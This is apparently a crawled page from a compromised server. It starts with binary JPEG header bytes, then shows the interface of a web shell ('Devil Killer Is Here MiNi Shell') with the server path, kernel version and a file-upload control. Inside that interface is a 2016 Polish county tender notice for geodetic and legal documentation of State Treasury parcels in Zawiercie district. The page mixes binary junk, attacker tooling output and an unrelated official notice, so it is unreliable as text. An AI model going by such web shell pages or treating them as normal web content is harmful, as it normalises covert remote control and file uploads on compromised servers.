JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160616/88955-N-2016.html

<p class="kh_header"><b>Zawiercie: Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa - 6 zadań</b><br>
<b>Numer ogłoszenia: 88955 - 2016; data zamieszczenia: 16.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starosta Zawierciański , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 67 107 10 do 12 wew. 551, faks 32 67 219 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.powiat.</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa - 6 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa- 6 zadań.

Przedmiotem zamówienia jest wykonanie n/w prac geodezyjnych podzielonych na 6 zadań: 

Zadanie 1. 
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Kroczyce, obręb Browarek k. m 1 oznaczonych jako działki o numerach: 229/5 o pow. 0,1000 ha ,231/1 o pow. 0,0800 ha,231/2 o pow. 0,1100 ha, ,234/4 o pow.0,1100 ha, 229/6 o pow. 0,1442 ha, 231/4 o pow. 0,0460 ha, 232/2 o pow. 0,2681 ha, 233/2 o pow. 0,2540 ha, 234/3 o pow. 0,1118 ha, 237/3 o pow. 0,2246 ha, 238/1 o pow. 0,0531 ha, 238/2 o pow. 0,1103 ha - pow. łączna ok. 1,6121 ha, 12 działek.

Zadanie nr 2
Analiza kompleksu ok. 42 działek i przygotowanie dokumentacji geodezyjno -prawnej z pomiarem i stabilizacją granic do złożenia ewidencji gruntów i budynków oraz regulacji stanu prawnego w drodze zasiedzenia nieruchomości Skarbu Państwa  oznaczonych jako działki o numerach:69/6,69/9,69/12,70/8,71/4,71/7,73/8 (z ujawnieniem   w ewidencji działek nr:69/5,69/7,69/8,69/16,70/7,70/12,71/6,71/9,73/7,73/10,74/6,74/7,74/8,10019,10020 obręb Zawada Pilicka, g. Irządze o pow. łącznej ok. 3 ha (regulacja 7 działek/ ujawnienie   22 dz.).
Zadanie nr 3
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Irządze, oznaczonych jako działki o numerach: 162/2 k. m. 1 o pow. 0,0760 ha (obręb Zawadka), 219/2 k. m. 1 o pow. 0,0262 ha (obręb Zawadka), 220/2 k. m. 1 o pow. 0,0166 ha (obręb Zawadka), 220/4 k. m. 1 o pow. 0,0002 ha (obręb Zawadka),75/10 k .m. 1 opow. 0,0116 ha (obręb Zawada Pilicka), 75/16 k .m. 1 opow. 0,0032 ha (obręb Zawada Pilicka), 77/8 k .m. 1 opow. 0,0473 ha (obręb Zawada Pilicka), 95/9 k .m. 1 opow. 0,1655 ha (obręb Zawada Pilicka), 172/4 k .m. 3 opow. 0,0700 ha (obręb Zawada Pilicka), 172/9 k .m. 3 opow. 0,0371 ha (obręb Zawada Pilicka), 172/13 k .m. 3 opow. 0,0301 ha (obręb Zawada Pilicka), 177/8  k .m. 1 opow. 0,1360 ha (obręb Zawada Pilicka), 186/5 k .m. 1 opow. 0,0735 ha (obręb Zawada Pilicka), 186/8 k .m. 1 opow. 0,1140 ha (obręb Zawada Pilicka), 187/4 k .m. 1 opow. 0,1355 ha (obręb Zawada Pilicka), 188/9 k .m. 1 opow. 0,0944 ha (obręb Zawada Pilicka), 188/12 k .m. 1 opow. 0,0984 ha (obręb Zawada Pilicka), 188/15 k .m. 1 opow. 0,0983 ha (obręb Zawada Pilicka), 190/4 k .m. 1 opow. 0,1274 ha (obręb Zawada Pilicka), 190/7 k .m. 1 o pow. 0,1985 ha (obręb Zawada Pilicka), 191/11 k .m. 1 opow. 0,0503 ha (obręb Zawada Pilicka), 195/2 k .m. 1 opow. 0,3820 ha (obręb Zawada Pilicka), 197/5 k .m. 1 opow. 0,0300 ha (obręb Zawada Pilicka), 197/6 k .m. 1 opow. 0,0739 ha (obręb Zawada Pilicka), 197/8  k .m. 1 opow. 0,1560 ha (obręb Zawada Pilicka), 199/6 k .m. 1 opow. 0,0587 ha (obręb Zawada Pilicka) -  pow. łączna ok.  2,3143  ha (26 działek).

Zadanie nr 4
Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Kroczyce, oznaczonych jako działki  o numerach:  411/1 k. m. 4 o pow. 0,0304 ha (obręb Biała Błotna), 413/1 k. m. 4 o pow. 0,2550 ha (obręb Biała Błotna), 416/4 k. m. 4 o pow. 0,0156 ha (obręb Biała Błotna), 416/2 k. m. 4 o pow. 0,4699 ha (obręb Biała Błotna), 447/1 k. m. 5 o pow. 0,3000 ha (obręb Biała Błotna), 617/4 k. m. 5 o pow. 0,0243 ha (obręb Biała Błotna), 606/20 k. m. 6 o pow. 0,1092 ha (obręb Biała Błotna), 606/21 k. m. 6 o pow. 0,6703 ha (obręb Biała Błotna), 609/1 k. m. 6 o pow. 0,7983 ha (obręb Biała Błotna), 611/1 k. m. 6 o pow. 0,1633 ha (obręb Biała Błotna),   1031/5 k.m.8 o pow. 0,0320 ha  ,918/2 k. m. 8 o pow. 0,0338 ha i 893/2 k.m.8  o pow.0,0117 (obręb Dzibice),1/2 k. m. 1 o pow. 0,0131 ha (obręb Kroczyce Okupne), 21/2 k. m. 1 o pow. 0,0187 ha(obręb Kroczyce Okupne), 39/2 k. m. 1 o pow. 0,0049 ha(obręb Kroczyce Okupne), 55/2 k. m. 1  o pow. 0,0187 ha(obręb Kroczyce Okupne),639/1 k. m. 6 o pow.0,0379 ha(obręb Kroczyce Okupne),645/2 k. m. 6 o pow. 0,5829 ha (obręb Kroczyce Okupne),645/6 k. m. 6 o pow. 0,0543 ha (obręb Kroczyce Okupne), 463/2 k. m. 6 opow. 0,0532 ha (obręb Kroczyce Okupne), 633/1 k. m.6 o pow. 0,0237 ha (obręb Kroczyce Okupne),   - pow. łączna ok.  3,7653  ha (22 działki).

Zadanie nr 5
Przygotowanie dokumentacji geodezyjnej - wykazu synchronizacyjnego do regulacji stanu prawnego nieruchomości Skarbu Państwa położonej  w Niegowoniczkach, g. Łazy  oznaczonej jako działki o numerach ewidencyjnych: 2206 k. m. 1 o pow. 0,2309 ha, 2221 k. m. 1 o pow. 0,1776 ha, 2222 k. m. 1 o pow. 0,3386 ha, 2223 k. m. 1 o pow. 0,9508 ha, 2224 k.m.1 o pow. 0,4812 ha, 2225 k. m. 1 opow. 0,6944 ha, 2226 k.m.1 opow. 4,1364 ha, 2227  k. m. 1 o pow. 0,4571 ha, 2228 k. m. 1 o pow. 0,4285 ha, 2229 k. m. 1 o pow. 0,4767 ha, 2939 k. m. 5 o pow. 0,2590 ha, 3115 k. m 8 o pow. 9,1163 ha.., 3116 k. m. 8 o pow. 11,1637 ha, 3155 k. m. 9 o pow. 3,2141 ha, 3273 k. m. 1 0o pow. 2,5371 ha, 3362 k.m.6 o pow. 0,2151 ha - 16 działek o pow. łącznej 34,8774 ha. (brak tytułów prawnych do części -starych- działek rzutujący na założenie księgi na działki po scaleniu),
Zadanie nr 6
Przygotowanie dokumentacji geodezyjno - prawnej  w celu doprowadzenia do zgodności zapisów ewidencji gruntów i budynków z mapą ewidencyjną oraz do regulacji stanu prawnego nieruchomości Skarbu Państwa położonej w Irządzach oznaczonej starym numerem ewidencyjnym 814 k. m. 7 o pow. 4,4000 ha (aktualnie działka ujawniona w ewidencji nr 1/814 o pow. 2,3500 ha.). Do działki nr 814 istnieje tytuł prawny - decyzja Naczelnika Gminy Irządze nr 7/75 z dnia 31.12.1975r. o przejęciu na własność Państwa gospodarstwa rolnego.

Szczegółowy opis przedmiotu zamówienia oraz zakres prac określają warunki techniczne, stanowiące załącznik nr 6 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 140.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania przedstawionego warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania przedstawionego warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania przedstawionego warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek ten  zostanie uznany za spełniony, jeśli wykonawca wykaże, iż  dysponuje lub będzie dysponował co najmniej 1 osobą posiadającą uprawnienia do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie określonym w art.43 pkt 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne  (tj. Dz.U. z 2015r. poz. 520 z późn. zm.) tj. uprawnienia w zakresie rozgraniczania i podziałów nieruchomości (gruntów) oraz sporządzenie dokumentacji do celów prawnych lub której uprawnienia zostały uznane zgodnie z przepisami ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz. 394), bądź na podstawie innych właściwych przepisów (Załącznik nr 5 do SIWZ). 2. Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  (Załącznik nr 5 do SIWZ).   Ocena spełniania przedstawionego warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ) tj. oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania przedstawionego warunku zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty (wg wzoru stanowiącego Załącznik Nr 1 do SIWZ )
2)	pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika   z innych dokumentów złożonych wraz z ofertą - treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany (w oryginale lub kopii poświadczonej za zgodność z oryginałem -kopia powinna być poświadczona notarialnie)  
3)	pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy (w oryginale lub kopii poświadczonej za zgodność z oryginałem -kopia powinna być poświadczona notarialnie)  
4)	pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia (o ile dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień niniejszej umowy mogą nastąpić za zgodą obu stron, wyrażoną na piśmie pod rygorem nieważności w przypadku wystąpienia okoliczności niemożliwych do przewidzenia w dacie zawarcia umowy, w szczególności:
1)	przekształcenia podmiotowego WYKONAWCY
2)	zmiany członków personelu kluczowego WYKONAWCY na skutek wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja / odejście  z pracy lub innych uniemożliwiających należyte wykonanie obowiązków zgodnie  z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez ZAMAWIAJĄCEGO na etapie wyboru oferty w postępowaniu przetargowym.
3)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu zamówienia
4)	zmiana osób upoważnionych do kontaktów w związku z realizacją zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Zawierciu (p.309)
ul. Sienkiewicza 34
42-400 Zawierciu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 11:00, miejsce: Starostwo Powiatowe w Zawierciu (p.309)
ul. Sienkiewicza 34
42-400 Zawierciu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji geodezyjno-prawnej z pomiarem do zasiedzenia do regulacji stanu prawnego nieruchomości Skarbu Państwa położonych w gminie Kroczyce, obręb Browarek k. m 1 oznaczonych jako działki o numerach: 229/5 o pow. 0,1000 ha ,231/1 o pow. 0,0800 ha,231/2 o pow. 0,1100 ha, ,234/4 o pow.0,1100 ha, 229/6 o pow. 0,1442 ha, 231/4 o pow. 0,0460 ha, 232/2 o pow. 0,2681 ha, 233/2 o pow. 0,2540 ha, 234/3 o pow. 0,1118 ha, 237/3 o pow. 0,2246 ha, 238/1 o pow. 0,0531 ha, 238/2 o pow. 0,1103 ha - pow. łączna ok. 1,6121 ha, 12 działek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 140.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest przygotowanie dokumentacji geodezyjno-prawnej do regulacji stanu prawnego nieruchomości Skarbu Państwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Analiza kompleksu ok. 42 działek i przygotowanie dokumentacji geodezyjno -prawnej z pomiarem i stabilizacją granic do złożenia ewidencji gruntów i budynków oraz regulacji stanu prawnego w drodze zasiedzenia nieruchomości Skarbu Państwa  oznaczonych jako działki o numerach:69/6,69/9,69/12,70/8,71/4,71/7,73/8 (z ujawnieniem   w ewidencji działek nr:69/5,69/7,69/8,69/16,70/7,70/12,71/6,71/9,73/7,73/10,74/6,74/7,74/8,10019,10020                  obręb Zawada Pilicka, g. Irządze o pow. łącznej ok. 3 ha (regulacja 7 działek/ ujawnienie   22 dz.)..</p></li>
